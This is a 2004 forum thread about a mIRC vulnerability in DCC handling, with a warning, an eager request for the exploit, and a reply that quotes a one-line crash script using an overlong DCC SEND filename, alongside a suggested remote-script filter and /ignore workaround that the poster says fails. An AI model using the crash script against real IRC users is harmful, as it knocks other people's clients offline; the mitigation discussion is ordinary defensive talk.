GIVE ME NEWEST MIRC EXPLOIT

Start new topic

Posted March 24, 200421 yr

There is a new mIRC exploit that has just been released. It is present in all mIRC versions up to and including version 6.14, and more specifically it is involved with DCCs. We recommend all users put /ignore -wd * in mIRCs perform list, as well as running this command right now.

i want it now, fast.. go look. FIND IT. :hyper: :hyper:

March 24, 200421 yr

or just read below

March 24, 200421 yr

There's a guy whos in my irc channel who has written a script that causes a server disconnect with an excessively long filename dcc send. Most pages on the web all refer to the same fix for 6.12 and some people are claiming the fix below works for them but it's not working for me for 6.12 or 6.14 crash (and doesn't work for a lot of folks). Here's the script that causes the crash:
---------------------------------------------------------------------
crash6.12 //raw -q privmsg $1 : $+ $chr(1) $+ DCC SEND x.txt $+ $str(x,265) 1 1 $+ $chr(1) | .echo -a Crashing $1

The fix is claimed to be:
Workaround:
If you think the above affects you, then here is a temporary fix that should be pasted in your "remotes" section (alt-r to access). The below
script rejects any excessively long filename:
ctcp *:dcc send:*: if ($len($nopath($filename)) >= 225) { echo 4 -s $nick
tried to crash you with an illegal dcc send of $nopath($filename) | halt }

Alternatively, this shorter version without the warning message:
ctcp *:dcc send:*: if ($len($nopath($filename)) >= 225) halt

If you are not comfortable with modifying your remotes, you can just
ignore all incoming DCC sends with the following, which is the same temporary fix as for the other bug described in the next section:
/ignore -wd *
-------------------------------------------------------------------------
Neither of which works for me on 6.12 (which is what the fix is for) or 6.14.